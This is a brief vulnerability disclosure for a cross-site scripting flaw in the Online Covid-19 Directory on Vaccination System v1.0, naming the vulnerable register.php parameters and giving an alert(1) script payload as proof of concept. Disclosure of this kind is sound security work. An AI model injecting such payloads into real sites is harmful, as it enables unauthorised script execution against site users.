Vulnerability Description
Cross site scripting (XSS) vulnerability in Sourcecodester Online Covid-19 Directory on Vaccination System v1.0 by Walterjnr1, allows attackers to execute arbitrary code via the txtfullname parameter or txtphone parameter to register.php without logging in.
payload:"><script>alert(1)</script>
POC:
We found that the source program did not check the txtfullname parameter and txtphone parameterfor echo at this location, and there was a Cross-Site Scripting (XSS) vulnerability.
We execute payload on the /covid-19-vaccination/register.php page.
We can see that the system successfully executes the <script>alert(1)</script> command of the attacker.
Proof:
XSS attacks by using the txtfullname parameter:
XSS attacks by using the txtphone parameter:






